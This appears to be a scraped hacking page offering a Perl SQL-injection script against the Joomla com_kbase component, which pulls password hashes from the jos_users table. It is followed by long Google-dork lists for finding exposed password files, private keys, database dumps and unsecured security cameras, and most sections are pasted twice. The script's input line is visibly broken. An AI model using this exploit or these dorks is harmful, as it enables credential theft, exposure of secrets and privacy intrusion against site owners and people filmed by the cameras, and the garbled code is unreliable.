SQL Injection Script
#Joomla Remote SQL Injection ScriptBy XShimeX
#Dork: inurl:index.php?option=com_kbase
#Contact: slientro[AT]yahoo.com.my (Replace [AT] with @)
use IO::Socket::INET;
use LWP::UserAgent;
print "[*] Joomla Remote SQL Injection Script By XShimeX\n";
print "[*] Dork: inurl:index.php?option=com_kbase\n";
print "[*] Example: http://target.com/joomla\n";
print "[*] Enter The Target: ";
chomp (my $target=);
$t = LWP::UserAgent->new() or die "Browser Failed\n";
$t->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
if (!$target){
print "[*] Please enter the target ;p\n";
system('exit');
}else {
$password = "password";
$table = "jos_users";
print "[*] Start attack for ".$target." !\n";
$inject=$target ."/index.php?option=com_kbase&view=article&id=-1+union+select+1,concat(".$password."),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+".$table."--";
$request = $t->request(HTTP::Request->new(GET=>$inject));
$answer = $request->content;
if ($answer =~/([0-9a-fA-F]{32})/){
print "[*] Password Hash : $1\n";
print "[*] Attack success ;p";
}else{
print "[*] Attack Failed\n";
}
}
#Dork: inurl:index.php?option=com_kbase
#Contact: slientro[AT]yahoo.com.my (Replace [AT] with @)
use IO::Socket::INET;
use LWP::UserAgent;
print "[*] Joomla Remote SQL Injection Script By XShimeX\n";
print "[*] Dork: inurl:index.php?option=com_kbase\n";
print "[*] Example: http://target.com/joomla\n";
print "[*] Enter The Target: ";
chomp (my $target=);
$t = LWP::UserAgent->new() or die "Browser Failed\n";
$t->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
if (!$target){
print "[*] Please enter the target ;p\n";
system('exit');
}else {
$password = "password";
$table = "jos_users";
print "[*] Start attack for ".$target." !\n";
$inject=$target ."/index.php?option=com_kbase&view=article&id=-1+union+select+1,concat(".$password."),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+".$table."--";
$request = $t->request(HTTP::Request->new(GET=>$inject));
$answer = $request->content;
if ($answer =~/([0-9a-fA-F]{32})/){
print "[*] Password Hash : $1\n";
print "[*] Attack success ;p";
}else{
print "[*] Attack Failed\n";
}
}
inurl:Index of
inurl:index.of.password Directory listing contains password file(s)? intitle:"Index of" service.pwd Directory listing contains service.pwd file(s) intitle:"Index of" view-source Directory listing contains view-source file(s) intitle:"Index of" admin Direcory listing contains administrative files or directories intitle:"Index of" .htpasswd Directory listing contains .htpasswd file! intitle:"Index of" log.txt Directory listing contians log text files intitle:"Index of" stats.html Directory listing contains stats.html which may contain useful web server statistics "access denied for user" "using password" Web page contains error message which might provide useful application information "A syntax error has occurred" filetype:ihtml Web page contains error message which might provide useful application information "ORA-00921: unexpected end of SQL command" Web page contains error message which might provide useful application information inurl:passlist.txt The passlist.txt file may contain user passwords "Index of /backup" Directory may contain sensitive backup files intitle:"Index of" .bash_history Directory listing contains bash history information intitle:"Index of" index.html.bak Directory listing contains backup index file (index.html.bak) intitle:"Index of" index.php.bak Directory listing contains backup index file (index.html.bak) intitle:"Index of" guestbook.cgi Directory listing contains backup index file (index.html.bak) intitle"Test Page for Apache" Default test page for Apache intitle:index.of.etc Directory listing of /etc ? filetype:xls username password XLS spreadseet containing usernames and passwords? "This file was generated by Nessus" Nessus report! intitle:"Index of" secring.bak Secret key file intitle:"Terminal Services Web Connection" Access terminal services! intitle:"Remote Desktop Web Connection" Access Remote Desktop! intitle:"Index of" access_log Directory listing contains access_log file which may store sensitive information intitle:"Index of" finance.xls Directory listing contains finance.xls which may contain sensitive information intitle:"Usage Statistics for" Statistical information may contain sensitive data intitle:"Index of" WSFTP.LOG WSFTP.LOG file contains information about FTP transactions intitle:"Index of" ws_ftp.ini The ws_ftp.ini file may contain usernames and passwords of FTP users "not for distribution" confidential URL may contain confidential or sensitive information "phpMyAdmin" "running on" inurl:"main.php" phpMyAdmin allows remote mysql database administration "#mysql dump" filetype:sql mysql database dumps "This summary was generated by wwwstat" Database statistics "Host Vulnerability Summary Report" Vulnerability report! "Network Vulnerability Assessment Report" Vulnerability report! inurl:php.ini filetype:ini The php.ini file may contain sensitive PHP environment details. BEGIN (CERTIFICATE|DSA|RSA) filetype:key Private key(s)! BEGIN (CERTIFICATE|DSA|RSA) filetype:csr Private key(s)! BEGIN (CERTIFICATE|DSA|RSA) filetype:crt Private key(s)! intitle:"Index of" passwd passwd.bak passwd file! intitle:"Index of" master.passwd master.passwd file! intitle:"Index of" pwd.db pwd.db file may contain password information intitle:"Index of..etc" passwd passwd file! filetype:cfg ks intext:rootpw -sample -test -howto This file may contain the root password (encrypted) intitle:"index.of.personal" Directory may contain sensitive information intitle:"Index of" login.jsp The login.jsp file may contain database username or password information intitle:"Index of" logfile Directory may contain sensitive log files filetype:php inurl:"viewfile" -"index.php" -"idfil File may contain PHP source code allinurl:intranet admin Page may contain sensitive information "supplied argument is not a valid MySQL result resource" mysql error message may reveal sensitive information "Error Diagnostic Information" intitle:"Error Occurred While" Error message may reveal sensitive information HTTP_USER_AGENT=Googlebot Page may contain sensitive environment details
Search GOOGLE:
allintitle: "Network Camera NetworkCamera" Network cameras
intitle:Axis 2400 video server Mostly security cameras, car parks, colleges, clubs, bars, etc.
intitle:axis intitle:"video server" Mostly security cameras, car parks, colleges, bars, ski slopes etc.<
intitle:"EvoCam" inurl:"webcam.html" Mostly European security cameras
intitle:"Live NetSnap Cam-Server feed" Network cameras, private and non private web cameras
intitle:"Live View / - AXIS" Mostly security cameras, car parks, colleges etc.
intitle:"LiveView / - AXIS" | inurl:view/view.shtml Mostly security cameras, car parks, colleges etc.
intitle:liveapplet Mostly security cameras, car parks, colleges, clubs, bars etc.
intitle:snc-cs3 inurl:home/ Mostly security cameras, swimming pools and more etc.
intitle:"snc-rz30 home" Mostly security cameras, shops, car parks
intitle:snc-z20 inurl:home/ Mostly security cameras, swimming pools and more etc.
intitle:"WJ-NT104 Main" Mostly security cameras, shops, car parks
inurl:LvAppl intitle:liveapplet Mostly security cameras, car parks, colleges etc.
inurl:indexFrame.shtml "Axis Video Server" Mostly security cameras, car parks, colleges etc.
inurl:lvappl A huge list of webcams around the world, mostly security cameras, car parks, colleges etc.
inurl:axis-cgi/jpg Mostly security cameras
inurl:indexFrame.shtml Axis Mostly security cameras, car parks, colleges etc.
inurl:"MultiCameraFrame?Mode=Motion" Mostly security cameras, pet shops, colleges etc.
inurl:/view.shtml Mostly security cameras, car parks, colleges etc.
inurl:/view/index.shtml Mostly security cameras, airports, car parks, back gardens, traffic cams etc.
inurl:viewerframe?mode= Network cameras, mostly private webcams etc.
inurl:"viewerframe?mode=motion" Network cameras
inurl:ViewerFrame?Mode=Refresh Mostly security cameras, parks, bird tables etc.
Other searches:
control/userimage.html
liveapplet
inurl:indexframe.shtml
inurl:"view/index.shtml"
inurl:"view/indexFrame.shtml"
inurl:view/view.shtml
inurl:/view/view.shtml?videos=
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Motion
inurl:ViewerFrame?Mode=Refresh
site:.viewnetcam.com -www.viewnetcam.com
/view/index.shtml
InTitle:
intitle:"live view" intitle:axis
intitle:"EvoCam" inurl:"webcam.html"
intitle:"i-Catcher Console - Web Monitor"
intitle:"Live NetSnap Cam-Server feed"
allintitle:liveapplet
intitle:liveapplet
intitle:"netcam live image"
intitle:"snc-rz30 home"
intitle:"WJ-NT104 Main"
InURL:
inurl:axis-cgi/jpg
inurl:indexFrame.shtml Axis
inurl:indexFrame.shtml "Axis Video Server"
inurl:lvappl live webcams
inurl:LvAppl intitle:liveapplet
inurl:"MultiCameraFrame?Mode=Motion"
inurl:/view:shtml
inurl:/view/index.shtml
inurl:view/indexframe.shtml
inurl:view/view.shtml
viewerframe?mode=
inurl:"viewerframe?mode=motion"
inurl:ViewerFrame?Mode=Refresh
Searches in one order:
intitle:"live view" intitle:axis (two searches in one order)
intitle:axis intitle:"video server"
intitle:liveapplet inurl:LvAppl
intitle:"Live View / - AXIS" , inurl:view/view.shtml
intitle:start inurl:cgistart
allintitle: "Network Camera NetworkCamera" Network cameras
intitle:Axis 2400 video server Mostly security cameras, car parks, colleges, clubs, bars, etc.
intitle:axis intitle:"video server" Mostly security cameras, car parks, colleges, bars, ski slopes etc.<
intitle:"EvoCam" inurl:"webcam.html" Mostly European security cameras
intitle:"Live NetSnap Cam-Server feed" Network cameras, private and non private web cameras
intitle:"Live View / - AXIS" Mostly security cameras, car parks, colleges etc.
intitle:"LiveView / - AXIS" | inurl:view/view.shtml Mostly security cameras, car parks, colleges etc.
intitle:liveapplet Mostly security cameras, car parks, colleges, clubs, bars etc.
intitle:snc-cs3 inurl:home/ Mostly security cameras, swimming pools and more etc.
intitle:"snc-rz30 home" Mostly security cameras, shops, car parks
intitle:snc-z20 inurl:home/ Mostly security cameras, swimming pools and more etc.
intitle:"WJ-NT104 Main" Mostly security cameras, shops, car parks
inurl:LvAppl intitle:liveapplet Mostly security cameras, car parks, colleges etc.
inurl:indexFrame.shtml "Axis Video Server" Mostly security cameras, car parks, colleges etc.
inurl:lvappl A huge list of webcams around the world, mostly security cameras, car parks, colleges etc.
inurl:axis-cgi/jpg Mostly security cameras
inurl:indexFrame.shtml Axis Mostly security cameras, car parks, colleges etc.
inurl:"MultiCameraFrame?Mode=Motion" Mostly security cameras, pet shops, colleges etc.
inurl:/view.shtml Mostly security cameras, car parks, colleges etc.
inurl:/view/index.shtml Mostly security cameras, airports, car parks, back gardens, traffic cams etc.
inurl:viewerframe?mode= Network cameras, mostly private webcams etc.
inurl:"viewerframe?mode=motion" Network cameras
inurl:ViewerFrame?Mode=Refresh Mostly security cameras, parks, bird tables etc.
Other searches:
control/userimage.html
liveapplet
inurl:indexframe.shtml
inurl:"view/index.shtml"
inurl:"view/indexFrame.shtml"
inurl:view/view.shtml
inurl:/view/view.shtml?videos=
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Motion
inurl:ViewerFrame?Mode=Refresh
site:.viewnetcam.com -www.viewnetcam.com
/view/index.shtml
InTitle:
intitle:"live view" intitle:axis
intitle:"EvoCam" inurl:"webcam.html"
intitle:"i-Catcher Console - Web Monitor"
intitle:"Live NetSnap Cam-Server feed"
allintitle:liveapplet
intitle:liveapplet
intitle:"netcam live image"
intitle:"snc-rz30 home"
intitle:"WJ-NT104 Main"
InURL:
inurl:axis-cgi/jpg
inurl:indexFrame.shtml Axis
inurl:indexFrame.shtml "Axis Video Server"
inurl:lvappl live webcams
inurl:LvAppl intitle:liveapplet
inurl:"MultiCameraFrame?Mode=Motion"
inurl:/view:shtml
inurl:/view/index.shtml
inurl:view/indexframe.shtml
inurl:view/view.shtml
viewerframe?mode=
inurl:"viewerframe?mode=motion"
inurl:ViewerFrame?Mode=Refresh
Searches in one order:
intitle:"live view" intitle:axis (two searches in one order)
intitle:axis intitle:"video server"
intitle:liveapplet inurl:LvAppl
intitle:"Live View / - AXIS" , inurl:view/view.shtml
intitle:start inurl:cgistart
Posts
